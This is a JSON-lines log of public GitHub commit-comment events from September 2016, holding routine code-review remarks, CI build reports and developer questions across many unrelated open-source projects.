{"id":"4544126720","type":"CommitCommentEvent","actor":{"login":"rottegift"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18973779,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-10T14:20:35Z","updated_at":"2016-09-10T14:20:35Z","body":"@brendonhumphrey \r\n\r\n(@lundman talks about holding on to memory and giving it back from time to time, he can skip to the 3rd last paragraph of this comment :) )\r\n\r\nWell, sure, this should be faster, because you're not doing the cacheline locking to poke holes in xnu's freelist, and xnu's also not unmapping pages (and doing expensive tlb shootdowns).\r\n\r\nPlease report the evolution of kstat.vmem.vmem.heap.mem_inuse and kstat.vmem.vmem.heap_parent.mem_import on your big-memory box.\r\n\r\nHave you hit a panic-by-watchdog yet?    \r\n\r\nheap_alloc in this call, passed in from vmem_init() can only fail by panic here:\r\n\r\nhttps://github.com/openzfsonosx/spl/blob/greedy/module/spl/spl-seg_kmem.c#L137\r\n\r\nBut you should hit nasty OOM behaviour before then.\r\n\r\nIf you unload when ...import is huge you might enjoy a TLB invalidation IPI timeout panic from xnu's pmap.c.\r\n\r\nAlso you can do even better by \"heap_alloc, NULL, heap_parent, 1024*1024, VM_SLEEP | VMC_POPULATOR | VM_NO_QCACHE), since the \"VM_NO_QCACHE\" flag stuffs the 1024*1024 into vmp->vm_min_import and that in turn is used in vmem_xalloc() to set a floor on the amount of memory in the argument to osif_malloc().    (You also get some benefit in xnu's pmap asid at unload :) ).\r\n\r\nUltimately the problem with this approach is that eventually (and this can be very quick on a 4GiB machine) wired grows to the point where userland starves for free memory and you get bad behaviour (including OOMs on WindowServer, for instance -- remember those? :) ).\r\n\r\nYou could try replacing the NULL with a function that maintains an arena of vmem spans that you can blow away with a vmem_walk() on occasion (see the vmem_walk() teardown examples in vmem_fini()).  For example, your heap_free function could cause the span to be imported into the freespace arena, which you can process in the background (in, or along the lines of vmem_update()).\r\n\r\nYou could alternatively maintain a freelist gradually (again see the example in the vmem teardown, you may want a freelist along the lines of what the vmem_walks construct) and blow it all away from time to time.\r\n\r\nThat's a direction of exploration which could be worthwhile, and which is very different from the way I've been going in my own experimental branch.  \r\n"}},"created_at":"2016-09-10T14:20:35Z"}
{"id":"4544126798","type":"CommitCommentEvent","actor":{"login":"lukaw3d"},"repo":{"name":"jkokosar/resolwe-bio"},"payload":{"comment":{"id":18973780,"position":124,"line":124,"path":"resolwe_bio/processes/import_data/differential_exp.yml","commit_id":"4ba1e9cec5903613a0820f18916759a906a436b6","created_at":"2016-09-10T14:20:40Z","updated_at":"2016-09-10T14:20:40Z","body":"This looks strange, compared to other calls. It has a duplicated `${NAME}.tab`"}},"created_at":"2016-09-10T14:20:40Z"}
{"id":"4544128317","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973786,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:21:36Z","updated_at":"2016-09-10T14:21:36Z","body":"I'm pretty sure they were - can always do a local test with some, especially to check if they're hitting the graveyard and not returning as a replacement effect."}},"created_at":"2016-09-10T14:21:36Z"}
{"id":"4544128446","type":"CommitCommentEvent","actor":{"login":"trofi"},"repo":{"name":"CIFASIS/megadeth"},"payload":{"comment":{"id":18973787,"position":null,"line":null,"path":null,"commit_id":"2c1c10ef8fb8f56cc12310514e1f029529d3d394","created_at":"2016-09-10T14:21:41Z","updated_at":"2016-09-10T14:21:41Z","body":"This commit broke single available release of QuickFuzz-0.1.\r\nLooks like hackage does not contain megadeth release compatible with QuickFuzz-0.1.\r\n"}},"created_at":"2016-09-10T14:21:41Z"}
{"id":"4544128549","type":"CommitCommentEvent","actor":{"login":"OlegIlyenko"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18973788,"position":33,"line":47,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-10T14:21:45Z","updated_at":"2016-09-10T14:21:45Z","body":"At the moment GraphiQL formats variables as a string with stringified JSON inside. I think it would help to mention this here because previously I noticed that it confuses a lot of people. \r\n\r\nAnother option, of course, would be to change the GraphiQL's behavior and format variables as a JSON object (just like in this example). WDYT? "}},"created_at":"2016-09-10T14:21:45Z"}
{"id":"4544128749","type":"CommitCommentEvent","actor":{"login":"lukaw3d"},"repo":{"name":"jkokosar/resolwe-bio"},"payload":{"comment":{"id":18973789,"position":124,"line":124,"path":"resolwe_bio/processes/import_data/differential_exp.yml","commit_id":"4ba1e9cec5903613a0820f18916759a906a436b6","created_at":"2016-09-10T14:21:54Z","updated_at":"2016-09-10T14:21:54Z","body":"And after that, these threee calls look strange compared to others, like:\r\n``parse_diffexp.py cuffdiff.tab --gene_id gene_id --fdr q_value --pvalue p_value --logfc \"log2(fold_change)\" --stat test_stat``"}},"created_at":"2016-09-10T14:21:54Z"}
{"id":"4544129193","type":"CommitCommentEvent","actor":{"login":"lukaw3d"},"repo":{"name":"jkokosar/resolwe-bio"},"payload":{"comment":{"id":18973790,"position":124,"line":124,"path":"resolwe_bio/processes/import_data/differential_exp.yml","commit_id":"4ba1e9cec5903613a0820f18916759a906a436b6","created_at":"2016-09-10T14:22:13Z","updated_at":"2016-09-10T14:22:13Z","body":"Oops, ignore that second comment"}},"created_at":"2016-09-10T14:22:13Z"}
{"id":"4544130124","type":"CommitCommentEvent","actor":{"login":"gaoleisunjing"},"repo":{"name":"gaoleisunjing/FirstBround"},"payload":{"comment":{"id":18973792,"position":4,"line":17,"path":"app/src/main/java/com/geolei/day0903/MyWebActivity.java","commit_id":"bd87494d3795cfa6b6d437ef1f7d9e3c51a80dcb","created_at":"2016-09-10T14:22:52Z","updated_at":"2016-09-10T14:22:52Z","body":"//这是在github网页的修改的"}},"created_at":"2016-09-10T14:22:52Z"}
{"id":"4544130597","type":"CommitCommentEvent","actor":{"login":"cmfrc4"},"repo":{"name":"cmfrc4/cervantes-see"},"payload":{"comment":{"id":18973793,"position":2,"line":2,"path":"README.md","commit_id":"0435a682e472df79ac45716dbec635371cfbc881","created_at":"2016-09-10T14:23:14Z","updated_at":"2016-09-10T14:23:14Z","body":"0435a682e472df79ac45716dbec635371cfbc881"}},"created_at":"2016-09-10T14:23:14Z"}
{"id":"4544130652","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18973794,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T14:23:17Z","updated_at":"2016-09-10T14:23:17Z","body":"Next test install, I'll comment out the fix.\r\nIirc, it complains that /run has 1o755, and we fix it to required 0o775"}},"created_at":"2016-09-10T14:23:17Z"}
{"id":"4544130781","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973795,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:23:23Z","updated_at":"2016-09-10T14:23:23Z","body":"Would be good to find out how it is, if we can do without the extra 'from the graveyard' bit that would be nice. But remember working through these, there are three cases where the text is the same, 1) return permanent to hand, 2) return spell to hand 3) return card in graveyard to hand. Try as I might, I cannot distinguish case 1 from case 3, that is why I introduced the extra words."}},"created_at":"2016-09-10T14:23:23Z"}
{"id":"4544134454","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973799,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:25:42Z","updated_at":"2016-09-10T14:25:42Z","body":"It does trigger, just that the effect is wrong, case 1 is using RemoveFromPlayAction whereas case 3 should be using ShiftCardAction. RemoveFromPlayAction does a permanent.isValid() check which would return false as the permanent is not longer on the battlefield."}},"created_at":"2016-09-10T14:25:42Z"}
{"id":"4544134935","type":"CommitCommentEvent","actor":{"login":"Rebaf"},"repo":{"name":"vChrisR/SolaDin"},"payload":{"comment":{"id":18973800,"position":null,"line":null,"path":null,"commit_id":"faf207e8ebb90cde803d66f91f55ad1e78a004b2","created_at":"2016-09-10T14:26:00Z","updated_at":"2016-09-10T14:26:00Z","body":"When I use a 10K resistor, it doesn't work. Looking at the original schematics for the Arduino (which uses 5 Volt) it should be a 6.8k resistor. That worked fine for me with the ESP8266."}},"created_at":"2016-09-10T14:26:00Z"}
{"id":"4544136460","type":"CommitCommentEvent","actor":{"login":"deroneriksson"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18973803,"position":null,"line":null,"path":null,"commit_id":"6bfccb712ff2d7decc887608b47fcac1b48fef4f","created_at":"2016-09-10T14:27:11Z","updated_at":"2016-09-10T14:27:11Z","body":"@mboehm7 Sure, sounds like a good idea."}},"created_at":"2016-09-10T14:27:11Z"}
{"id":"4544137031","type":"CommitCommentEvent","actor":{"login":"snaphuman"},"repo":{"name":"ecos-codeaholics/factory-of-procedures-front"},"payload":{"comment":{"id":18973804,"position":null,"line":null,"path":null,"commit_id":"6968a571633bb271ca0c72b2575a98c69ff3dd62","created_at":"2016-09-10T14:27:33Z","updated_at":"2016-09-10T14:27:33Z","body":"This is a good start point to handle production mode of our app. We should review the implementation of a configuration file that allow us to switch between modes ;)"}},"created_at":"2016-09-10T14:27:33Z"}
{"id":"4544137376","type":"CommitCommentEvent","actor":{"login":"zhixiongtan"},"repo":{"name":"btoueg/LCM-object-viewer"},"payload":{"comment":{"id":18973805,"position":null,"line":null,"path":null,"commit_id":"f5cb048f130d6c6d75c338c98a7120e3d7f4f778","created_at":"2016-09-10T14:27:46Z","updated_at":"2016-09-10T14:27:46Z","body":"dear Mr.Toueg ,\r\n           I am a Chinese postgraduate majoring in nuclear engineering .  I've some questions on code dragon and donjon. It would be appreciate if i can have your contact information for further discussion.  My email address is 13710228936@163.com. Sorry  for bothering you. Thanks very much. \r\n                                                                                                            sincerely \r\n                                                                                                              zhixiong tan "}},"created_at":"2016-09-10T14:27:46Z"}
{"id":"4544141775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973816,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T14:30:48Z","updated_at":"2016-09-10T14:30:48Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T14:30:48Z"}
{"id":"4544141899","type":"CommitCommentEvent","actor":{"login":"vlyahovich"},"repo":{"name":"jakwuh/es-decorators"},"payload":{"comment":{"id":18973817,"position":4,"line":4,"path":"src/Debounce.js","commit_id":"6dd006417c23a18e0e85b297ee26ff071b989ef1","created_at":"2016-09-10T14:30:54Z","updated_at":"2016-09-10T14:30:54Z","body":"jsdoc"}},"created_at":"2016-09-10T14:30:54Z"}
{"id":"4544142119","type":"CommitCommentEvent","actor":{"login":"vlyahovich"},"repo":{"name":"jakwuh/es-decorators"},"payload":{"comment":{"id":18973818,"position":1,"line":1,"path":"src/DecorateInstance.js","commit_id":"6dd006417c23a18e0e85b297ee26ff071b989ef1","created_at":"2016-09-10T14:31:01Z","updated_at":"2016-09-10T14:31:01Z","body":"jsdoc"}},"created_at":"2016-09-10T14:31:01Z"}
{"id":"4544145068","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973821,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:33:09Z","updated_at":"2016-09-10T14:33:09Z","body":"Just tested, it needs the 'from the graveyard' to function - don't know how long those auras have been missing that"}},"created_at":"2016-09-10T14:33:09Z"}
{"id":"4544147618","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18973824,"position":null,"line":null,"path":null,"commit_id":"bb6da769bd26fd5f831deb0edf886c7808ec974b","created_at":"2016-09-10T14:34:56Z","updated_at":"2016-09-10T14:34:56Z","body":"The count of the number of permutations of an empty set is 1\r\n\r\nAlso the Iterator class can know exactly how many elements it would produce, so a `count-only` could be added.\r\n\r\n---\r\n\r\nI think the line with:\r\n\r\n    permutations(0).map: { self[@$_] }\r\n\r\ncould be replaced with just:\r\n\r\n    ((),).Seq\r\n"}},"created_at":"2016-09-10T14:34:56Z"}
{"id":"4544147987","type":"CommitCommentEvent","actor":{"login":"HaMzadevelop"},"repo":{"name":"HaMzadevelop/hShooting"},"payload":{"comment":{"id":18973827,"position":34,"line":42,"path":"README.md","commit_id":"50b30ad404fca1338b3f8704d0a8eebc44ee810b","created_at":"2016-09-10T14:35:12Z","updated_at":"2016-09-10T14:35:12Z","body":"# Errors:\r\n> README Version Not Upgrade"}},"created_at":"2016-09-10T14:35:12Z"}
{"id":"4544149071","type":"CommitCommentEvent","actor":{"login":"kkaravitis"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":18973828,"position":31,"line":31,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/WicketPortletConfig.java","commit_id":"2f930ffb0e24f4990def418e1aa1932803cb2f30","created_at":"2016-09-10T14:35:57Z","updated_at":"2016-09-10T14:35:57Z","body":"You are right, I will modify the code according to your advice!"}},"created_at":"2016-09-10T14:35:57Z"}
{"id":"4544150038","type":"CommitCommentEvent","actor":{"login":"abelbeck"},"repo":{"name":"arno-iptables-firewall/aif"},"payload":{"comment":{"id":18973830,"position":null,"line":null,"path":null,"commit_id":"c316801bbd45e7605a4dc63f1c283885b5aa5096","created_at":"2016-09-10T14:36:31Z","updated_at":"2016-09-10T14:36:31Z","body":"@arnova Please give this a test when you have a chance. (or sooner :-) )\r\n\r\nWorks well with Linux 3.2.x and the latest ipset 6.29.  In theory ipset works with a 2.6.32 kernel, we will need to determine if the ipset command line syntax is generally the same across distro versions. It should be.\r\n\r\nAs it is, this is no change but gives users a chance to test with ipset, for release 2.0.1g.\r\n\r\nIf things look good over time we could make IPTABLES_IPSET=1 the default with the 2.0.1h release but still honor IPTABLES_IPSET=0 to provide a fallback."}},"created_at":"2016-09-10T14:36:31Z"}
{"id":"4544151997","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"commons-app/apps-android-commons"},"payload":{"comment":{"id":18973832,"position":null,"line":null,"path":null,"commit_id":"1d55c6f2b5e692ed541b37ec6b0bab9ea4f710fa","created_at":"2016-09-10T14:37:53Z","updated_at":"2016-09-10T14:37:53Z","body":"Sometimes Travis behaves, or they changed the version of something so any commit would have resulted in the same error.\r\n\r\nHere the error message is \"Killed\" so I guess Travis was doing some maintenance. Don't worry and just check the result again at the next commit."}},"created_at":"2016-09-10T14:37:53Z"}
{"id":"4544152973","type":"CommitCommentEvent","actor":{"login":"amenk"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":18973835,"position":54,"line":54,"path":"dev/tools/grunt/tools/files-router.js","commit_id":"494cdbc46de764520cf15f7f1e9a2b0bcb71f5c9","created_at":"2016-09-10T14:38:34Z","updated_at":"2016-09-10T14:38:34Z","body":"why .loc instead of .local (abbreviations s*ck) ... and it would be even better to use local.js - so syntax highlighting works properly in the editors."}},"created_at":"2016-09-10T14:38:34Z"}
{"id":"4544153570","type":"CommitCommentEvent","actor":{"login":"melvinzhang"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973837,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:38:58Z","updated_at":"2016-09-10T14:38:58Z","body":"> working backwards to remove ones no longer needed.\r\nDo you mean you update the entire card with output of scripts-builder, then remove the unnecessary changes? How would you remove them? Seems pretty hard.\r\n\r\nIf the goal is to only update a couple of properties, it should be easy to write a script to do it. Something like `update-property image <dir to the new property> <dir with cards to be updated>`. Would something like be useful?"}},"created_at":"2016-09-10T14:38:58Z"}
{"id":"4544154029","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973838,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T14:39:17Z","updated_at":"2016-09-10T14:39:17Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-10T14:39:17Z"}
{"id":"4544154656","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18973840,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T14:39:47Z","updated_at":"2016-09-10T14:39:47Z","body":"But it show below error when deploy:\n\n10:30 PM Uploaded 1 files and blobs.\n10:30 PM Compilation starting.\n10:30 PM Compilation: 1 files left.\n10:30 PM Error 422: --- begin server output ---\nCompile failed:\n2016/09/10 07:30:19 go-app-builder: build timing: 1×compile (350ms total),\n0×link (0 total)\n2016/09/10 07:30:19 go-app-builder: failed running compile: exit status 1\n\nweb.go:11: can't find import: \"github.com/yinqiwen/gsnova/common/event\"\n--- end server output ---\n10:30 PM Rolling back the update.\nError 422: --- begin server output ---\n\n--- end server output ---\nerror while running appcfg.py: exit status 1\n\n\n2016-09-10 21:31 GMT+08:00 yinqiwen <notifications@github.com>:\n\n>\n>    1. git clone -b master https://github.com/yinqiwen/gsnova/ $GOPATH/src/\n>    github.com/yinqiwen/gsnova <http://github.com/yinqiwen/gsnova>\n>    2. cd $GOPATH/src/github.com/yinqiwen/gsnova/remote/gae\n>    3. appcfg.py -A -V 1 update ./\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18973655>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK_y79mRhk75u8xXViTmdfPJfnybzdOgks5qorE7gaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-10T14:39:47Z"}
{"id":"4544154762","type":"CommitCommentEvent","actor":{"login":"silencender"},"repo":{"name":"silencender/YADroneTest"},"payload":{"comment":{"id":18973841,"position":null,"line":null,"path":null,"commit_id":"23c03f3b9a7cabe8ace2b576eef2ef20141cff22","created_at":"2016-09-10T14:39:52Z","updated_at":"2016-09-10T14:39:52Z","body":"Fixes #1 "}},"created_at":"2016-09-10T14:39:52Z"}
{"id":"4544157368","type":"CommitCommentEvent","actor":{"login":"Sunny609"},"repo":{"name":"Sunny609/webStudy"},"payload":{"comment":{"id":18973846,"position":null,"line":null,"path":null,"commit_id":"f5d08e7d2badc3b98e4a3e111129e61d55a018b9","created_at":"2016-09-10T14:41:40Z","updated_at":"2016-09-10T14:41:40Z","body":"delete"}},"created_at":"2016-09-10T14:41:40Z"}
{"id":"4544158528","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973847,"position":null,"line":null,"path":null,"commit_id":"ece15ab802cc84fede5037ed07cda548e07fb265","created_at":"2016-09-10T14:42:28Z","updated_at":"2016-09-10T14:42:28Z","body":"With the pending oracle update for token generation, it could be handy to have some other methods available - however I'm unable to use Makefile on windows.\r\n\r\nThere's quite a few things which scriptbuilder won't be able to integrate:\r\nvalue,\r\nstatic,\r\nremoval,\r\nstatus,\r\nmana,\r\nAI casting restrictions\r\n"}},"created_at":"2016-09-10T14:42:28Z"}
{"id":"4544160092","type":"CommitCommentEvent","actor":{"login":"ryder2025"},"repo":{"name":"pbombnz/SuperKiwi"},"payload":{"comment":{"id":18973848,"position":8,"line":21,"path":".travis.yml","commit_id":"06e9f68acac0d18444b762a6e039c18bba9601d6","created_at":"2016-09-10T14:43:31Z","updated_at":"2016-09-10T14:43:31Z","body":"Thanks"}},"created_at":"2016-09-10T14:43:31Z"}
{"id":"4544160343","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18973849,"position":null,"line":null,"path":null,"commit_id":"e312c8d2c8f32e4e09c8a8ac58017b6ede95171e","created_at":"2016-09-10T14:43:42Z","updated_at":"2016-09-10T14:43:42Z","body":"Why not. "}},"created_at":"2016-09-10T14:43:42Z"}
{"id":"4544161182","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":18973850,"position":null,"line":null,"path":null,"commit_id":"6927ca643961a9f83963a23d7795ccd24044d248","created_at":"2016-09-10T14:44:19Z","updated_at":"2016-09-10T14:44:19Z","body":"So if we had a mirrorscfg module, it would be ideally run after locale and language setting was picked up by cal, and it would only rank the irrors of the live session. Other modules could then simply copy the live mirrorlist to target root."}},"created_at":"2016-09-10T14:44:19Z"}
{"id":"4544161183","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18973851,"position":null,"line":null,"path":null,"commit_id":"813de8e15cd48f37f068ebc873789cf8634fb822","created_at":"2016-09-10T14:44:19Z","updated_at":"2016-09-10T14:44:19Z","body":"I added an actual `WARNING`."}},"created_at":"2016-09-10T14:44:19Z"}
{"id":"4544161908","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18973853,"position":null,"line":null,"path":null,"commit_id":"449150fbd420b8b3b69cc8347e70e6a914588ea2","created_at":"2016-09-10T14:44:45Z","updated_at":"2016-09-10T14:44:45Z","body":"looks good"}},"created_at":"2016-09-10T14:44:45Z"}
{"id":"4544162530","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kyleprods"},"payload":{"comment":{"id":18973856,"position":null,"line":null,"path":null,"commit_id":"a5aa06a1dc9148658256793d8b444a5f2eb77de2","created_at":"2016-09-10T14:45:10Z","updated_at":"2016-09-10T14:45:10Z","body":"Why performance profiles didn't exist with SandPox's PowerHAL?"}},"created_at":"2016-09-10T14:45:10Z"}
{"id":"4544162838","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":18973858,"position":22,"line":20,"path":"Yupi.Model/Domain/Rooms/Chat/ChatlogEntry.cs","commit_id":"23995be1bec66ce54a134d45f917f55af3a7515e","created_at":"2016-09-10T14:45:20Z","updated_at":"2016-09-10T14:45:20Z","body":"Sure that is a good way to do it?"}},"created_at":"2016-09-10T14:45:20Z"}
{"id":"4544163070","type":"CommitCommentEvent","actor":{"login":"git-bigdatatrunk"},"repo":{"name":"git-bigdatatrunk/Big-data-Internship-Program---Part-1-Foundation"},"payload":{"comment":{"id":18973859,"position":null,"line":null,"path":null,"commit_id":"2649fca5c0443b31661b967abfcd01ceb255b45a","created_at":"2016-09-10T14:45:29Z","updated_at":"2016-09-10T14:45:29Z","body":"Map-Reduce code"}},"created_at":"2016-09-10T14:45:29Z"}
{"id":"4544164603","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18973861,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T14:46:30Z","updated_at":"2016-09-10T14:46:30Z","body":"The env 'GOPATH' must to be set first,  and gsnova source code must be in $GOPATH/src/github.com/yinqiwen/gsnova/. "}},"created_at":"2016-09-10T14:46:30Z"}
{"id":"4544165254","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":18973862,"position":null,"line":null,"path":null,"commit_id":"cd2d106d92006099b577c707c6d9b75a14bc0c8d","created_at":"2016-09-10T14:46:56Z","updated_at":"2016-09-10T14:46:56Z","body":"mantaaab bung, cuma urutan keluarga lom bener, anak terkecil bisa jadi anak ke satu"}},"created_at":"2016-09-10T14:46:56Z"}
{"id":"4544167330","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973866,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T14:48:15Z","updated_at":"2016-09-10T14:48:15Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T14:48:15Z"}
{"id":"4544171018","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"GetSimpleCMS/GetSimpleCMS"},"payload":{"comment":{"id":18973868,"position":null,"line":null,"path":null,"commit_id":"d126037183aa30f8e6c41e51abfa4b64baa32088","created_at":"2016-09-10T14:50:42Z","updated_at":"2016-09-10T14:50:42Z","body":"this commit is missing from master merge, hmm"}},"created_at":"2016-09-10T14:50:42Z"}
{"id":"4544174999","type":"CommitCommentEvent","actor":{"login":"BrunoSpy"},"repo":{"name":"BrunoSpy/olcc"},"payload":{"comment":{"id":18973872,"position":null,"line":null,"path":null,"commit_id":"e6297b59c73aa2a10b2729c5f3b07ecaa4b6e876","created_at":"2016-09-10T14:53:29Z","updated_at":"2016-09-10T14:53:29Z","body":"Fixes #3 "}},"created_at":"2016-09-10T14:53:29Z"}
{"id":"4544177137","type":"CommitCommentEvent","actor":{"login":"misaochan"},"repo":{"name":"commons-app/apps-android-commons"},"payload":{"comment":{"id":18973875,"position":null,"line":null,"path":null,"commit_id":"1d55c6f2b5e692ed541b37ec6b0bab9ea4f710fa","created_at":"2016-09-10T14:55:03Z","updated_at":"2016-09-10T14:55:03Z","body":"Oh okay, thanks!"}},"created_at":"2016-09-10T14:55:03Z"}
{"id":"4544177470","type":"CommitCommentEvent","actor":{"login":"Mongh"},"repo":{"name":"Mongh/HTML"},"payload":{"comment":{"id":18973876,"position":null,"line":null,"path":null,"commit_id":"c1ee08df1825354bf0f2992eebc50fe7dfef2823","created_at":"2016-09-10T14:55:17Z","updated_at":"2016-09-10T14:55:17Z","body":"*{\r\n\tfont-family: Phetsarath OT;\r\n}\r\n.header{\r\n\tbackground-color: black;\r\n\theight: 100px;\r\n\tcolor: #ffffff;\r\n}\r\n.header h2{\r\n\ttext-align: center;\r\n\tline-height: 50px;\r\n}\r\n.footer{\r\n\tbackground-color: black;\r\n\theight: 100px;\r\n\tcolor: #ffffff;\r\n}\r\n.ssss{\r\n\tbackground-color: #e06000;\r\n\theight: 45px;\r\n\tfont-family: Pethsarath OT;\r\n}\r\n.ssss h4{\r\nline-height: 50px;\r\ncolor: #ffffff;\r\nfont-size: 16pt;\r\nmargin-left: 20px;\r\nmargin-right: 20px;\r\nfont-family: Pethsarath OT;\r\n}"}},"created_at":"2016-09-10T14:55:17Z"}
{"id":"4544177693","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":18973878,"position":null,"line":null,"path":null,"commit_id":"cd2d106d92006099b577c707c6d9b75a14bc0c8d","created_at":"2016-09-10T14:55:27Z","updated_at":"2016-09-10T14:55:27Z","body":"kalau di reload jadi bener bung .."}},"created_at":"2016-09-10T14:55:27Z"}
